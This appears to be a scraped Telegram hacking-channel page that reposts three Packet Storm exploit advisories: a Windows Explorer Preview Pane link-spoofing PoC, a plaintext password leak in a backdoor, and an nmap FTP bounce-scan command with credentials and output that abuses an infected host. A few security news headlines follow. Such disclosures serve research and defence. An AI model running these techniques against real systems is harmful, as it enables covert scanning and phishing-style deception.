Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Windows Explorer Preview Pane HTML File Link Spoofing

https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
The Windows Explorer Preview Pane feature allows for spoofing of links contained in an HTML based file because upon moving the mouse over the link nothing happens and it cannot be right-clicked to show the actual target.

MD5 | a101017ac8f951413bcaa011440d398c

Download
# Exploit Title: Windows Explorer Preview Pane HTML File Link Spoofing Vulnerability
# Google Dork: n/a
# Date: December 25th, 2021
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: Windows 7, 8.1, 10, 11 (x86/x64 )
# Tested on: Windows 7, 8.1, 10, 11 (x86/x64)
# CVE : n/a

Windows Explorer Preview Pane feature allows for spoofing of links contained in an HTML based file because upon moving the mouse over the link nothing happens and it cannot be right-clicked to show the actual target.
The app invoked to parse the HTML file in Preview Pane is "prevhost.exe" and it uses MSHTML platform.

PoC:

==============PreviewMe.htm=========================
Click the link to your favorite search engine!
http://www.google.com/
=====================================================

vídeo demo: https://www.youtube.com/watch?v=A6yhlpRVoV4

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Visiotrol.10 Insecure Password Storage

https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
Backdoor.Win32.Visiotrol.10 malware suffers from an insecure password storage vulnerability.

MD5 | cfd2722c816f01c1b11d6b1edaf8bb31

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/f9dc0a462ada737f36efafac56f22b97.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Visiotrol.10
Vulnerability: Insecure Password Storage
Description: The malware listens by default on TCP port 4567. The default password "vc" is very weak and stored in a plaintext file named "config.vcs" on disk.
Type: PE32
MD5: f9dc0a462ada737f36efafac56f22b97
Vuln ID: MVID-2021-0431
Disclosure: 12/25/2021

Exploit/PoC:
c:\>type config.vcs
vc##4567##OFF##OFF##OFF##

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.FTP.Simpel.12 Man-In-The-Middle

https://2.bp.blogspot.com/-4wIBcK0z7y4/WWlvHXARtRI/AAAAAAAAILc/wzdKaT4lYrUxiztYZaNra08YExR9F67-wCLcBGAs/s1600/h14.png
Backdoor.Win32.FTP.Simpel.12 malware suffers from a man-in-the-middle vulnerability.

MD5 | 656e6c397f7dc608d3c805af661c0eed

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/1d12f9b921b38d7b521f12442bdd52d8.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.FTP.Simpel.12
Vulnerability: Port Bounce Scan
Description: The malware listens on TCP port 22. Third-party intruders who successfully logon can abuse the backdoor FTP server as a man-in-the-middle machine allowing PORT Command bounce scan attacks using Nmap. This vulnerability allows remote attackers to abuse your system and discreetly conduct network port scanning. Victims will then think these scans are originating from the infected system running the afflicted malware FTP Server and not you.
Type: PE32
MD5: 1d12f9b921b38d7b521f12442bdd52d8
Vuln ID: MVID-2021-0432
Disclosure: 12/27/2021

Exploit/PoC:
nmap -n -Pn -b cRaCkeN:!supernova@192.168.18.129:22 -p21,22,80 192.168.18.237 -v
Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-26 21:42 Pacific Standard Time
Resolved FTP bounce attack proxy to 192.168.18.129 (192.168.18.129).
Attempting connection to ftp://cRaCkeN:!supernova@192.168.18.129:22
Connected:220 SSH-1.99-OpenSSH_3.6.1p1.
Login credentials accepted by FTP server!
Initiating Bounce Scan at 21:43
Removed 22
Changed my mind about port 22
Removed 21
Changed my mind about port 21
Discovered open port 80/tcp on 192.168.18.237
Completed Bounce Scan at 21:43, 2.39s elapsed (3 total ports)
Nmap scan report for 192.168.18.237
Host is up.

PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
80/tcp open http

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 11.61 seconds
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
AV-Comparatives Reveals Results of Long-Term Tests of 19 Leading Endpoint Security Solutions

The Business Security Test is a comprehensive investigation of corporate endpoint security solutions on the market.
Dark Reading: Attacks/Breaches
After Google's Landmark Settlement, How Ad Networks Should Tackle Child Privacy

To comply with the updated COPPA Rule, online ad platforms need to change how they handle viewers who might be children.
Astroport has just doubled its critical bug bounty reward from $1.5m to $3m, making it the largest bounty on Immunefi’s platform, beating…Continue reading on Immunefi » (https://medium.com/immunefi/astroport-boosts-bug-bounty-to-3m-takes-top-leaderboard-spot-7e7d1ed73bcc?source=rss------bug_bounty-5)